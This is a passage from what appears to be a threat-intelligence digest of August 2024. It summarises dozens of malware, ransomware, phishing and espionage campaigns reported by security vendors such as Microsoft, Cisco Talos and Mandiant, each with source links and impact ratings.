Source: https://blog.phylum.io/north-korea-still-attacking-developers-via-npm/

Intel Source:: Microsoft

Intel Name:: Peach_Sandstorm

Date of Scan:: 2024-08-28

Impact:: MEDIUM

Summary:: Between April and July 2024, Microsoft observed Iranian state-sponsored group Peach Sandstorm deploying custom malware, named Tickler, in intelligence-gathering operations targeting U.S. and UAE sectors like satellite, communications, oil and gas, and government. The group, linked to the Iranian Islamic Revolutionary Guard Corps (IRGC), continued to employ password spray attacks, primarily targeting defense and government organizations for intelligence collection. Additionally, Peach Sandstorm utilized fraudulent Azure infrastructure for command-and-control operations and leveraged social engineering through LinkedIn to gather intelligence.

Source: https://www.microsoft.com/en-us/security/blog/2024/08/28/peach-sandstorm-deploys-new-custom-tickler-malware-in-long-running-intelligence-gathering-operations/

Intel Source:: Any.Run

Intel Name:: RobotDropper

Date of Scan:: 2024-08-28

Impact:: MEDIUM

Summary:: A new low-detection MSI dropper named "RobotDropper" has been discovered, which delivers malware such as Lumma and Stealc. This dropper uses a password-protected RAR archive and has a very low detection rate on VirusTotal. It communicates with multiple domains, requesting users to confirm they're human before sending data.

Source: https://x.com/anyrun_app/status/1828798277828890788

Intel Source:: GRIT

Intel Name:: Hidden_Attacks_Targeting_US_Organizations

Date of Scan:: 2024-08-28

Impact:: LOW

Summary:: Researchers from The GuidePoint Research and Intelligence Team (GRIT) have discovered a campaign targeting over 130 US-based companies from various industries. The attackers target individual individuals within these organizations and utilize social engineering techniques to acquire their login information and one-time passcodes. This is difficult to detect since attackers frequently communicate through direct phone calls or text messages, eliminating typical security measures. If users fail to report unusual calls or messages, authorities may be unaware that an attack is taking place. The attackers keep trying new users until they discover one who falls for the fraud.

Source: https://www.guidepointsecurity.com/blog/so-phish-ticated-attacks/

Intel Source:: Seqrite

Intel Name:: Operation_Oxidovy

Date of Scan:: 2024-08-28

Impact:: LOW

Summary:: Seqrite researchers have discovered a malware campaign targeting government and military officials in the Czech Republic using deceptive tactics related to the relationship between NATO and the Czech Republic. The attackers employed a sophisticated malware system which includes a Rust-based loader called Freeze and a C2 framework known as HavocC2. The campaign involved two decoy documents: one with instructions for changing passwords on the Ministry of Defense internal network and another discussing the Czech Republic's relationship with NATO.

Source: https://www.seqrite.com/blog/operation-oxidovy-sophisticated-malware-campaign-targets-czech-officials-using-nato-themed-decoys/

Intel Source:: Cyble

Intel Name:: Scammers_Exploit_Zoom_to_Distribute_ScreenConnect

Date of Scan:: 2024-08-28

Impact:: MEDIUM

Summary:: Researchers from Cyble have noticed that scammers are using a fake Zoom webpage to deceive people into downloading ScreenConnect software. This software allows them to remotely manipulate the victims' machines. The scammers are also responsible for other scams aimed at Social Security Administration (SSA) account holders, utilizing spam emails that falsely appear to be from SSA support.

Source: https://cyble.com/blog/scammers-use-screenconnect-to-defraud-ssa-beneficiaries/

Intel Source:: NetSkope

Intel Name:: Phishers_Leverage_Microsoft_Sway_for_Scams

Date of Scan:: 2024-08-28

Impact:: LOW

Summary:: Netskope researchers have recently discovered that attackers are misusing the Microsoft Sway presentation application offered free inside Microsoft 365, for phishing. Attackers are taking advantage of this legitimate cloud application, as it gives them a reputation already because the victims are logged in to their Microsoft 365. The option of sharing the content or embedding it in web pages makes the content useful for phishing attempts effectiveness.

Source: https://www.netskope.com/blog/phishing-in-style-microsoft-sway-abused-to-deliver-quishing-attacks

Intel Source:: Trustwave

Intel Name:: Mallox_Ransomware_Attack_Details

Date of Scan:: 2024-08-28

Impact:: MEDIUM

Summary:: A recent investigation by Trustwave uncovered that unauthorized access to a client's internal cloud environment led to a Mallox ransomware attack. Mallox, also known as FARGO, initially targeted Microsoft SQL servers but has since evolved to affect Linux systems and VMware ESXi environments. It first appeared as Ransomware-as-a-Service in mid-2023, Mallox has been working against different industries including IT and government, and has followed a double extortion model.

Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/exposed-and-encrypted-inside-a-mallox-ransomware-attack/

Intel Source:: CISA

Intel Name:: Iranian_Threat_Actor_target_US_Entities

Date of Scan:: 2024-08-28

Impact:: MEDIUM

Summary:: A joint advisory has been issued by the FBI, CISA, and DC3 stating that Iranian threat actors continue to target organizations in the U.S. and other countries such as Israel, Azerbaijan and the UAE. These actors Primarily focus on gaining access to networks in various sectors including education, finance, healthcare, defense and government bodies in the U.S so that they can collaborate with ransomware groups to deploy ransomware. The FBI believes these hackers are connected to the government of Iran and are engaged in activities to steal sensitive information, especially from organizations in Israel and Azerbaijan.

Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a

Intel Source:: Securelist

Intel Name:: Similarities_Between_BlackJack_and_Twelve

Date of Scan:: 2024-08-28

Impact:: LOW

Summary:: Researcher at Securelist have identified Blackjack and Twelve hacktivist group who uses same tactic and tools. Blackjack emerged in late 2023 and targets Russian organisations and government agencies. This group uses various open-source tools like SSH client Putty, Shamoon, ngrok and AnyDesk. Similarly, another hacktivist group called Twelve also relies on publicly available tools and doesn’t develop its own tools. Both groups are not interested in financial gain but aim to damage target organizations by encrypting, deleting, and stealing data and resources.

Source: https://securelist.ru/blackjack-hacktivists-connection-with-twelve/110326/

Intel Source:: Huntress

Intel Name:: Persistent_Attack_on_Vietnamese_Human_Rights_NGO

Date of Scan:: 2024-08-28

Impact:: LOW

Summary:: Researchers from Huntress have identified a complicated cyber attack targeting a non-profit group dedicated to Vietnamese human rights. This attack may have been ongoing for almost four years. Researchers first spotted strange behavior, which prompted a more thorough analysis, revealing the hidden ways the attacker remained within the system and the activities they conducted. Huntress Managed EDR played an important role in this process, assisting the team in detecting and removing the attacker's presence across several platforms.

Source: https://www.huntress.com/blog/advanced-persistent-threat-targeting-vietnamese-human-rights-defenders

Intel Source:: ISC.SANS

Intel Name:: Python_Popularity_in_Windows_Attacks_Explained

Date of Scan:: 2024-08-28

Impact:: LOW

Summary:: Python's popularity among attackers on Windows is due to its ease of deployment, extensibility with libraries, and ability to bypass AMSI (Anti-Malware Scan Interface). Undoubtedly, this multiplicity provides Python with the capability to access numerous system components & APIs, which makes it useful for malicious purposes. Attackers often use batch files to deliver and reconstruct Python scripts for tasks like data exfiltration.

Source: https://isc.sans.edu/diary/rss/31208

Intel Source:: Cisco Talos

Intel Name:: BlackByte_Ransomware_Tactics_and_New_Developments

Date of Scan:: 2024-08-28

Impact:: MEDIUM

Summary:: Researchers from Cisco Talos have seen that BlackByte ransomware is employing techniques that depart from their well-established tradecraft. For example, they have taken advantage of a vulnerability in VMware ESXi that allows for authentication bypass, known as CVE-2024-37085, shortly after it was discovered, and have used the victim's authorized remote access method rather than utilizing a commercial remote administration tool like AnyDesk.

Source: https://blog.talosintelligence.com/blackbyte-blends-tried-and-true-tradecraft-with-newly-disclosed-vulnerabilities-to-support-ongoing-attacks/

Intel Source:: Fortinet

Intel Name:: A_New_Variant_of_Snake_Keylogger

Date of Scan:: 2024-08-28

Impact:: LOW

Summary:: Fortinet researchers have uncovered a phishing campaign where attackers send emails with a malicious Excel file. The email tricks users to open the file by claiming that funds have been transferred to their account. However, once the user opens the file then it secretly runs malicious code that downloads and installs a new version of Snake Keylogger. This main function of this malware is to steal login details from various software such as web browsers, email clients and FTP clients and then send this stolen data to the attacker via email using the SMTP protocol.

Source: https://www.fortinet.com/blog/threat-research/deep-analysis-of-snake-keylogger-new-variant

Intel Source:: Trend Micro

Intel Name:: CVE_2023_22527_Exploiting_for_Cryptojacking

Date of Scan:: 2024-08-28

Impact:: LOW

Summary:: Researchers from TrendMicro have assessed that CVE-2023-22527 is a critical vulnerability currently exploited for cryptojacking, where attackers turn compromised systems into cryptomining operations. These attacks involve deploying shell scripts and XMRig miners against SSH endpoints that destroy competing miners and are scheduled as cron jobs for execution.

Source: https://www.trendmicro.com/en_us/research/24/h/cve-2023-22527-cryptomining.html

Intel Source:: ESET

Intel Name:: CVE20247262_APTC60_Exploitation

Date of Scan:: 2024-08-28

Impact:: MEDIUM

Summary:: ESET researchers have discovered a vulnerability (CVE-2024-7262) in WPS Office for Windows, which is used by 500 million users globally. This vulnerability was being exploited by a cyberespionage group called APT-C-60 from South Korea to attack individuals and organizations in East Asia. The vulnerability was found in a spreadsheet file that appears normal but contains a malicious link. When a user clicks this link in WPS Spreadsheet, it executes malicious code on their computer. The objective of the attack is to install a backdoor called SpyGlace, which allows attackers to remotely control the victim’s computer.

Source: https://www.welivesecurity.com/en/eset-research/analysis-of-two-arbitrary-code-execution-vulnerabilities-affecting-wps-office/

Intel Source:: Lumen

Intel Name:: Versa_Director_Zero_Day_Exploit_CVE_2024_39717

Date of Scan:: 2024-08-28

Impact:: LOW

Summary:: Researchers from Lumen Technologies have discovered a zero-day vulnerability (CVE-2024-39717) in Versa Director servers which used to manage SD-WAN setups. This bug affects all versions prior to 22.1.4. Attackers can exploit the vulnerability by using a modified web shell called "VersaMem" to steal passwords and obtain access to client networks.

Source: https://blog.lumen.com/taking-the-crossroads-the-versa-director-zero-day-exploitation/

Intel Source:: AGID-CERT

Intel Name:: AgenziaEntrate_Phishing_Campaign

Date of Scan:: 2024-08-28

Impact:: LOW

Summary:: Researchers at CERT-AGID have tracked the phishing emails impersonating the Revenue Agency. In such messages, the user makes a payment to receive a monetary compensation, and the email requests the user to fill out a form so that the refund can be processed. This scam is aimed at obtaining personal and banking details of the targets.

Source: https://x.com/agidcert/status/1828445147463356550?s=12&t=8PuF3QXqo9azqMLbBfcyeA

Intel Source:: QiAnXIn

Intel Name:: Operation_DevilTiger

Date of Scan:: 2024-08-27

Impact:: MEDIUM

Summary:: APT-Q-12, also known as Pseudo Hunter, is a cyber espionage group with a Northeast Asian background, targeting countries in East Asia, including China, North Korea, Japan, and South Korea. It was first identified by BlackBerry in 2017, and connected with the Darkhotel organization, but the group saw changes in its operations. However, between 2019 and the present there was less visible related activity, while new attack patterns focused on the Korean Peninsula appeared, indicating that these are the elements belonging to Darkhotel. Research shows that APT groups use various plugins to tailor their data exfiltration methods to their specific needs.

Source: https://ti.qianxin.com/blog/articles/operation-deviltiger-0day-vulnerability-techniques-and-tactics-used-by-apt-q-12-disclosed-en/

Intel Source:: ISC.SANS

Intel Name:: From_Obfuscated_Batch_File_to_XWorm_and_Redline

Date of Scan:: 2024-08-27

Impact:: LOW

Summary:: According to the SANS researchers, a new form of malware has emerged, designed to spread via spam emails and exploit kits. One such obfuscation technique is illustrated in the report where an encoded batch file is used for XWorm and Redline malware deployment. It then highlights how these early complexities were eventually exploited to inject XWorm and Redline into the system.

Source: https://isc.sans.edu/diary/From+Highly+Obfuscated+Batch+File+to+XWorm+and+Redline/31204/

Intel Source:: SonicWall

Intel Name:: AutoIT_Bot_Targets_Gmai_Accounts

Date of Scan:: 2024-08-27

Impact:: LOW

Summary:: Researchers at SonicWall have discovered an AutoIT-compiled executable program that tries to open Gmail login pages using different web browsers like MS Edge, Chrome and Firefox. It can read clipboard data, capture keystrokes, switch users, and even restart or shut down the system. It can also detect if it is being analysed by a debugger and can block user input or take control of the keyboard and mouse when needed. Researchers also advise for being caution when running unknown files, particularly those with vague names like file.exe.

Source: https://blog.sonicwall.com/en-us/2024/08/autoit-bot-targets-gmail-accounts-first/

Intel Source:: Securelist

Intel Name:: HZ_Rat_Backdoor_Targets_macOS_Users

Date of Scan:: 2024-08-27

Impact:: LOW

Summary:: Researchers from Securelist have observed a macOS version of the HZ Rat backdoor that targets customers of the enterprise messaging service DingTalk and the messaging network WeChat. This discovery suggests that the threat actors who initiated past attacks are still active. During the research, it was discovered that the virus primarily collects user data, but it has the ability to spread laterally across the victim's network. The collected data, which includes company and contact information, might be used to monitor on individuals of interest and plan attacks in the future.

Source: https://securelist.com/hz-rat-attacks-wechat-and-dingtalk/113513/

Intel Source:: Cyfirma

Intel Name:: A_Deep_Dive_Into_Angry_Stealer

Date of Scan:: 2024-08-27

Impact:: LOW

Summary:: Cyfirma researcher have discovered a new malware called Angry stealer which is being promoted on telegram and other online platforms. This malware created in .Net which install two malicious files Stepasha.exe and MotherRussia.exe. Stepasha.exe design to steal sensitive data, such as browser information, cryptocurrency wallets, VPN credentials, and system. details. Angry Stealer is based on another malware called “Rage Stealer” and shares similar features. Additionally, the malware includes another tool called MotherRussia.exe is a tool that helps to create more malicious programs, potentially for further attacks like remote desktop access and bot operations.

Source: https://www.cyfirma.com/research/a-comprehensive-analysis-of-angry-stealer-rage-stealer-in-a-new-disguise/

Intel Source:: NTT

Intel Name:: New_AppDomainManager_Injection_Malware_Trend

Date of Scan:: 2024-08-27

Impact:: MEDIUM

Summary:: Researchers from NTT have observed recent incidents where AppDomainManager Injection executes malware, a technique first seen in 2017. The attack technique involves downloading a ZIP file from an attacker-controlled website or receiving it via spear phishing email. The ZIP file contains a malicious MSC file exploiting the GrimResource technique, which allows malicious actions upon simply opening the MSC file, bypassing the need for user interaction. These MSC files often disguise themselves with misleading icons, like those of PDFs or Windows certificates.

Source: https://jp.security.ntt/tech_blog/appdomainmanager-injection

Intel Source:: ASEC

Intel Name:: Godzilla_WebShell_Targeting_Financial_Sector

Date of Scan:: 2024-08-27

Impact:: LOW

Summary:: Researchers from ASEC have discovered a recent attack targeting the financial sector using a vulnerability in the ASP .NET ViewState function. The attack caused the Godzilla WebShell malware to be installed on target systems. This WebShell is not only meant for command execution, file operations, and ShellCode launching, but comes with features for further exploitation including mimikatz and petitpotam. It is significant to point out that Godzilla WebShell utilizes a fileless technique, where the binaries are kept inside the session meta-data instead of looking for them.

Source: https://asec.ahnlab.com/ko/82668/

Intel Source:: Palo Alto

Intel Name:: Gulaoder_Malware

Date of Scan:: 2024-08-27

Impact:: LOW

Summary:: Palo Alto researchers have identified a malware GuLoader malware which install the RAT on compromised machines. This malware includes a file called Web Browser Password Viewer" that steals the login credentials from compromised system and send these credentials to the attacker through the Remcos RAT communication channel. The malware also keeps the attacker informed about any activity on the compromised system, allowing the attacker to monitor the system in real-time.

Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-08-26-GuLoader-for-Remcos-RAT-IOCs.txt

Intel Source:: Forcepoint

Intel Name:: AsyncRAT_Escalates_with_TryCloudflare_Tunnels

Date of Scan:: 2024-08-27

Impact:: LOW

Summary:: AsyncRAT is a well-known malware that enables the hacker to remotely access the infected Windows system and perform actions such as exfiltrate sensitive data, known for its evasion of antivirus detection. However, recent research from Forcepoint X-Labs have uncovered an unsuspected campaign making use of TryCloudflare’s tunnel tool and python packages to deliver AsyncRAT. Attackers use "search-ms" URIs attached in HTML email files for malicious deployment of LNK spyware and Python scripts. The campaign targets mainly the health, travel and banking industries using phishing attacks, with a noticeable surge in activity in recent days.

Source: https://www.forcepoint.com/blog/x-labs/asyncrat-python-trycloudflare-malware?utm_source=Forcepoint&utm_medium=linkedin&utm_campaign=websecurity%2Cglobalpost%2Cemailsecurity%2Caudiencebuilding%2CBlog-X-Labs%2Cnoproduct

Intel Source:: QiAnXIn

Intel Name:: New_Spyder_Downloader_Variant_Revealed

Date of Scan:: 2024-08-27

Impact:: MEDIUM

Summary:: Researchers at QiAnXIn have identified a new variant of the Spyder downloader, previously analyzed in reports by the same center. This updated Spyder downloader, while maintaining its core functionality of releasing and executing components from remotely downloaded encrypted ZIP packages, now also deploys two new steganographic components. These components are used for taking screenshots and collecting file information. Notable changes in this variant include modifications to the code structure and C&C (Command and Control) communication format.

Source: https://ti.qianxin.com/blog/articles/analysis-of-new-variants-and-components-of-patchwork-spyder-downloader-en/

Intel Source:: DFIR Report

Intel Name:: BlackSuit_Ransomware_Update

Date of Scan:: 2024-08-26

Impact:: MEDIUM

Summary:: DFIR Report tracked an intrusion culminated in the deployment of BlackSuit ransomware, following the execution of a Cobalt Strike beacon. The attack, spread over 15 days, involved a range of tools like Sharphound, Rubeus, and SystemBC, with command and control traffic concealed via CloudFlare. The attacker leveraged Windows utilities for system enumeration, lateral movement through SMB and RDP, and deployed multiple Cobalt Strike beacons. On the final day, after executing ADFind and PowerShell scripts, the BlackSuit ransomware was distributed via SMB and executed manually, resulting in encrypted files and ransom notes across the affected systems.

Source: https://thedfirreport.com/2024/08/26/blacksuit-ransomware/#indicators

Intel Source:: Twitter

Intel Name:: MalwareHunterTeam_Aug26

Date of Scan:: 2024-08-26

Impact:: MEDIUM

Summary:: August 26, 2024 findings from MalwareHunterTeam

Source: https://x.com/malwrhunterteam

Intel Source:: Aon

Intel Name:: Sedexp_Linux_Malware

Date of Scan:: 2024-08-26

Impact:: MEDIUM

Summary:: Stroz Friedberg uncovered a stealthy Linux malware named "sedexp" that exploits the lesser-known udev rules to maintain persistence and evade detection. Active since 2022, sedexp operates by executing whenever specific device events occur, notably using memory manipulation to hide itself from common system commands. It also features reverse shell capabilities, enabling attackers to remotely control compromised systems. Primarily used by financially motivated actors, sedexp has been linked to credit card scraping activities on web servers.

Source: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp

Intel Source:: ASEC

Intel Name:: Malware_disguised_as_a_browser_update

Date of Scan:: 2024-08-23

Impact:: LOW

Summary:: ASEC researchers have identified that malware is spreading disguised as a browser update through infected websites to unspecified targets. When a user visits these sites, a fake browser update appears for Chrome or Firefox which ask the user to download a malicious file directly. The downloaded files come in different formats such as EXE, ZIP, APPX, and VHD (virtual disk file). Inside the VHD, there is a hidden shortcut file (LNK) that triggers malicious activities using PowerShell commands and communicates with the attacker's C&C server. Attackers are increasingly using legitimate online services to distribute this malware.

Source: https://asec.ahnlab.com/ko/82620/

Intel Source:: Checkpoint

Intel Name:: Enhancing_Detection_via_ssdeep_Fuzzy_Hashing

Date of Scan:: 2024-08-23

Impact:: LOW

Summary:: Check Point researchers are investigating the usage of ssdeep, a fuzzy hashing software, to improve phishing and malware detection. Ssdeep generates fuzzy hashes that identify similar material in files by recognizing patterns in code, and while it is well-known for malware detection, its success in detecting new threats depends on enhanced AI analytics.

Source: https://blog.checkpoint.com/security/enhancing-phishing-and-malware-detection-with-ssdeep-fuzzy-hashing/

Intel Source:: PaloAlto

Intel Name:: Bling_Libra_Exploiting_AWS

Date of Scan:: 2024-08-23

Impact:: LOW

Summary:: Researchers from Palo Alto Networks have discovered that Bling Libra, the gang behind the ShinyHunters ransomware, has shifted their focus from data theft to the complete extortion of their victims. In a recent case, Bling Libra got access to an organization's AWS system by using real credentials discovered in public repositories. Although the breach was less severe due to the limited rights granted by these credentials, the gang was still able to access and change data in S3 buckets.

Source: https://unit42.paloaltonetworks.com/shinyhunters-ransomware-extortion/

Intel Source:: Cado Security

Intel Name:: Cthulhu_Stealer_Malware_Targeting_macOS_Users

Date of Scan:: 2024-08-23

Impact:: LOW

Summary:: Cado Security Researchers have recently found Cthulhu Stealer, a malware-as-a-service (MaaS) that targets Mac users. This malware, delivered as an Apple disk image (DMG), includes binaries for many platforms and is developed in GoLang. It disguises itself as legitimate software and lures users into opening the DMG, then utilizes macOS's osascript tool to prompt for their password, providing illegal access.

Source: https://www.cadosecurity.com/blog/from-the-depths-analyzing-the-cthulhu-stealer-malware-for-macos

Intel Source:: ASEC

Intel Name:: APT_Attack_by_using_noMu_Backdoor

Date of Scan:: 2024-08-23

Impact:: LOW

Summary:: Researchers at ASEC have discovered that an unknown attacker has been targeting users and systems in South Korea with various remote-control malware. The attacker uses tools like reverse shells, backdoors, and software for remote screen control such as VNC and RDP to target Korean users. They use malware like Fxfdoor and noMu along with remote control tools like AsyncRAT, TightVNC, Netcat and AnyDesk to control infected systems. They also install a tool called WebBrowserPassView to steal saved passwords from web browsers, aiming to steal information.

Source: https://asec.ahnlab.com/ko/82628/

Intel Source:: X (Twitter)

Intel Name:: Active_C2_Panels_of_Meduza_Stealer_Revealed

Date of Scan:: 2024-08-23

Impact:: LOW

Summary:: Meduza Stealer is a malware designed to steal sensitive information from compromised systems. Active Command and Control (C2) panels of Meduza Stealer are the interfaces cybercriminals use to manage and control infected devices. These panels allow attackers to execute commands, collect stolen data, and monitor the status of the infected machines in real-time. The presence of active C2 panels indicates ongoing malicious activity and a continuing threat to system security.

Source: https://x.com/FalconFeedsio/status/1826613611961483476

Intel Source:: MalwareBytes

Intel Name:: Fake_Funeral_Scams_Target_Facebook_Users

Date of Scan:: 2024-08-23

Impact:: LOW

Summary:: Malwarebytes researchers have discovered that scammers on Facebook are exploiting distressed individuals by using fake funeral live stream links and stolen images. These scammers trick people to click these links to steal money or credit card information. There are two primary tactics: one involves fake funeral live stream links that encourage people to click and share the link with friends and family. The other asks for donations on behalf of the deceased's family. These scams often begin with a comment under a funeral home's announcement on Facebook.

Source: https://www.malwarebytes.com/blog/news/2024/08/fake-funeral-live-stream-scams-target-grieving-users-on-facebook

Intel Source:: S2W BLOG

Intel Name:: New_puNK_003_Malware_CURKON_Linked_to_KONNI_Group

Date of Scan:: 2024-08-23

Impact:: LOW

Summary:: S2W researchers have discovered and analyzed CURKON, a new malware belonging to the puNK-003 group, a North Korean APT, on April 24th, 2024. Unlike Dropper-type malware from KONNI group, CURKON is an LNK file functioning as a Downloader. It contributes to the download of AutoIt scripts that eventually run Lilith RAT (Lilith RAT currently re-implemented in AutoIt script). This RAT uses reverse shell for allowing remote command execution. In comparison to KONNI which employs VBS as well as BAT scripts, this shows that AutoIt is used by CURKON differently. However, though they are classified separately, the obfuscation techniques used in CURKON suggest connection to KONNI.

Source: https://medium.com/s2wblog/threat-tracking-analysis-of-punk-003s-lilith-rat-ported-to-autoit-script-30dd59e68213

Intel Source:: Cyble

Intel Name:: Unmasking_Cloud_Extortion_Campaign

Date of Scan:: 2024-08-22

Impact:: LOW

Summary:: Researchers from Cyble have found a sophisticated cloud extortion campaign targeting 110,000 domains using misconfigured AWS.env files. By scanning insecure web apps for exposed.env files, the attackers gathered credentials and ransomed cloud storage data. The attackers utilized stolen AWS Identity and Access Management (IAM) access keys to create new IAM roles with all permissions.

Source: https://cyble.com/blog/widespread-cloud-exposure/

Intel Source:: Aqua Sec

Intel Name:: PG_MEM_Malware_Targets_PostgreSQL_for_Mining

Date of Scan:: 2024-08-22

Impact:: MEDIUM

Summary:: Aqua Security researchers have discovered PG_MEM, a new PostgreSQL malware that brute-forces its way into databases, inserts payloads to hide its behavior, and mines cryptocurrency. They documented a successful brute-force attack on a PostgreSQL database, which took use of a feature that allowed command execution.

Source: https://aquasec.com/blog/pg_mem-a-malware-hidden-in-the-postgres-processes/

Intel Source:: MalwareBytes

Intel Name:: Hundreds_of_Online_Stores_Hacked

Date of Scan:: 2024-08-22

Impact:: LOW

Summary:: Malwarebytes recently detected a new malware campaign targeting online stores using the Magento e-commerce platform. The attackers injected malicious code into hundreds of sites, allowing them to steal customers' credit card information during checkout. The skimmer malware is hidden within a simple script tag that loads obfuscated JavaScript, seamlessly inserting a fake "Payment Method" frame to capture sensitive data like credit card numbers, expiration dates, and CVV codes in real-time.

Source: https://www.malwarebytes.com/blog/news/2024/08/hundreds-of-online-stores-hacked-in-new-campaign

Intel Source:: Cofense

Intel Name:: Fake_Survey_Targets_Office_365_Login

Date of Scan:: 2024-08-22

Impact:: MEDIUM

Summary:: The Cofense Phishing Defense Center recently uncovered a phishing campaign targeting employee engagement surveys to steal Microsoft Office 365 credentials. In this campaign, threat actors pretended to be mid-year engagement surveys through emails and duped employees into entering their usernames. The phishing email that was designed with a fake domain and authoritative tone of voice, urging people who received it to complete a survey at Wufoo—a site often misused for these fraudulent activities. The page asked for the employee's full name before redirecting them to a fraudulent Microsoft login page.

Source: https://cofense.com/blog/mid-year-engagement-trap-how-fake-surveys-are-used-in-phishing

Intel Source:: Mandiant Google

Intel Name:: PEAKLIGHT

Date of Scan:: 2024-08-22

Impact:: MEDIUM

Summary:: Mandiant has uncovered a new memory-only malware dropper called PEAKLIGHT, which is used to deliver various malware, including LUMMAC.V2, SHADOWLADDER, and CRYPTBOT. The infection begins with malicious LNK files disguised as pirated movie downloads, which execute PowerShell scripts via system binaries. PEAKLIGHT operates as an obfuscated PowerShell-based downloader that checks for specific files and, if absent, retrieves them from a content delivery network (CDN). The malware employs several advanced evasion techniques, such as CDN abuse and binary proxy execution, making it harder to detect. Mandiant observed multiple variations of the downloader, each showing unique characteristics and payloads

Source: https://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding-stealthy-memory-only-malware/

Intel Source:: Cyble

Intel Name:: Cheana_Stealer_Targets_VPN_Users

Date of Scan:: 2024-08-22

Impact:: LOW

Summary:: Cyble researchers have identified a phishing campaign where attackers are targeting people who are trying to download VPN applications for Windows, Linux, and macOS. The attackers created a fake website that mimics the legitimate 'WarpVPN' service, tricking users into installing a malicious program called Cheana Stealer. This malware steals sensitive information like cryptocurrency data, browser logins, cookies, SSH keys, and macOS passwords. The phishing site offers detailed installation instructions specific to each platform (Windows, Linux, macOS) to ensure the malware runs properly.

Source: https://cyble.com/blog/new-cheana-stealer-targets-vpn-user/

Intel Source:: Cado Security

Intel Name:: Uncovering_Typosquatting

Date of Scan:: 2024-08-22

Impact:: LOW

Summary:: In a recent routine check, Cado Security researchers have identified a typosquatting domain that closely resembled their corporate website. This domain was part of a deceptive tactic used by cybercriminals to trick users into visiting a fraudulent site.

Source: https://www.cadosecurity.com/blog/vigilance-in-action-monitoring-typosquatting-domains

Intel Source:: Datadog

Intel Name:: A_New_Opportunistic_Log4j_Campaign

Date of Scan:: 2024-08-21

Impact:: LOW

Summary:: Researchers at Datadog have identified an opportunistic campaign where attackers is leveraging the log4j vulnerability (CVE-2021-44228) to launch crypto-mining attacks and compromise systems. The attackers use hidden LDAP requests to evade detection and execute malicious scripts on vulnerable Java applications. Once the script is executed, it performs system checks, installs a crypto-mining program, and sets up backdoors for ongoing control. It also gathers complete system information and sends it to a remote server, then deletes itself, clears the command history, and removes traces of its execution.

Source: https://securitylabs.datadoghq.com/articles/the-gift-that-keeps-on-giving-a-new-opportunistic-log4j-campaign/

Intel Source:: AnyRun

Intel Name:: August2024_Phishing_Campaigns

Date of Scan:: 2024-08-21

Impact:: MEDIUM

Summary:: ANY.RUN researchers have discovered several sophisticated phishing campaigns, including the Tycoon 2FA Phish-kit, which exploits compromised Amazon SES accounts and uses multiple redirects to conceal phishing pages. Some variants display fake error messages to trick users into entering credentials, while others target U.S. government organizations by impersonating Microsoft Teams. Another campaign abuses Freshdesk's email API to host phishing pages, and a large-scale phishing effort uses SharePoint to host malicious PDFs, making detection difficult. These attacks often employ CAPTCHA and legitimate-looking pages to evade security measures.

Source: https://any.run/cybersecurity-blog/phishing-campaigns-august-24

Intel Source:: Trend Micro

Intel Name:: Quickly_Thwarts_Play_Ransomware_Attack

Date of Scan:: 2024-08-21

Impact:: LOW

Summary:: Trend Micro researchers have identified and contained a Play ransomware infection through a coordinated response. The attack involved using Play ransomware with SYSTEMBC, a proxy malware for delivering additional payloads, and GRIXBA, a customized tool to avoid detection by signature-based methods. Not only did these hackers take advantage of credible tools like PsExec and Remote Desktop Protocol (RDP) but used “living-off-the-land” style to secretly attack their targets without detection from security measures.

Source: https://www.trendmicro.com/en_us/research/24/h/pressing-pause-on-play-ransomware.html

Intel Source:: PaloAlto

Intel Name:: DNS_Traffic_Analysis_for_Cyber_Threats

Date of Scan:: 2024-08-21

Impact:: LOW

Summary:: Researchers from Palo Alto Networks have observed that rogue DNS requests exhibit unusual patterns when compared to legitimate traffic, allowing them to identify potentially risky domains. They created an autoencoder-based deep learning solution that profiles and encodes DNS traffic in real time. They developed a classifier to detect unusual patterns associated with cyberthreats by establishing a baseline of common DNS activity and using threat information.

Source: https://unit42.paloaltonetworks.com/profiling-detecting-malicious-dns-traffic/

Intel Source:: Cisco Talos

Intel Name:: New_MoonPeak_RAT_Linked_to_North_Korean_Group

Date of Scan:: 2024-08-21

Impact:: LOW

Summary:: Researchers at Cisco Talos have discovered a new RAT family called “MoonPeak” which was developed from an open-source XenoRAT malware. This version is currently being enhanced by a North Korean APT named UAT-5394. Their investigation into the infrastructure associated with this campaign has unveiled further connections to the UAT-5394 network, along with new tactics, techniques, and procedures (TTPs) employed by the attackers.

Source: https://blog.talosintelligence.com/moonpeak-malware-infrastructure-north-korea/

Intel Source:: CERT-AGID

Intel Name:: New_Vidar_Campaign_Spreading_via_PEC

Date of Scan:: 2024-08-21

Impact:: LOW

Summary:: CERT-AGID researcher have uncovered a new wave of malicious emails spreading the Vidar malware through PEC (Certified Electronic Mail). These emails look like a reply to previous messages and include a link to download a malicious JavaScript file, but only if the request comes from a Windows machine. The attackers are using multiple subdomains to avoid detection, but all the malicious scripts ultimately lead to the same malicious URL. However, the attackers continue to change their methods to stay ahead of detection.

Source: https://cert-agid.gov.it/news/contrastata-nuova-campagna-vidar-diffusa-via-pec/

Intel Source:: MalwareBytes

Intel Name:: Slack_Malvertising

Date of Scan:: 2024-08-21

Impact:: MEDIUM

Summary:: Malwarebytes researchers recently discovered a malvertising campaign targeting Slack through Google search ads. Initially, the ad appeared legitimate and redirected users to Slack’s official site, but over time it began redirecting through a click tracker to malicious domains. This domain impersonated Slack and delivered malware linked to SecTopRAT, a remote access trojan. The threat actors used tactics like cloaking and click trackers to evade detection, making it challenging to trace the ad's true intent and behavior.

Source: https://www.malwarebytes.com/blog/news/2024/08/fraudulent-slack-ad-shows-malvertisers-patience-and-skills

Intel Source:: Kandji

Intel Name:: Todoswift_Malware_Targets_MacOs

Date of Scan:: 2024-08-21

Impact:: LOW

Summary:: Kandji researchers have discovered a new malware called Todo Swift that is linked to the North Korean hacking group BlueNoroff. This malware is disguised as a legitimate application which is written in SwiftUI that tricks users by pretending to download and display a PDF about Bitcoin price predictions. However, while the PDF is downloaded, the malware secretly downloads a more dangerous program from a suspicious URL in the background by using a curl command to avoid detection. This second-stage malware can steal data or allow remote control of the infected system.

Source: https://www.kandji.io/blog/todoswift-disguises-malware-download-behind-bitcoin-pdf

Intel Source:: Proofpoint

Intel Name:: TA453_Targets_Religious_Figure_with_BlackSmith

Date of Scan:: 2024-08-20

Impact:: LOW

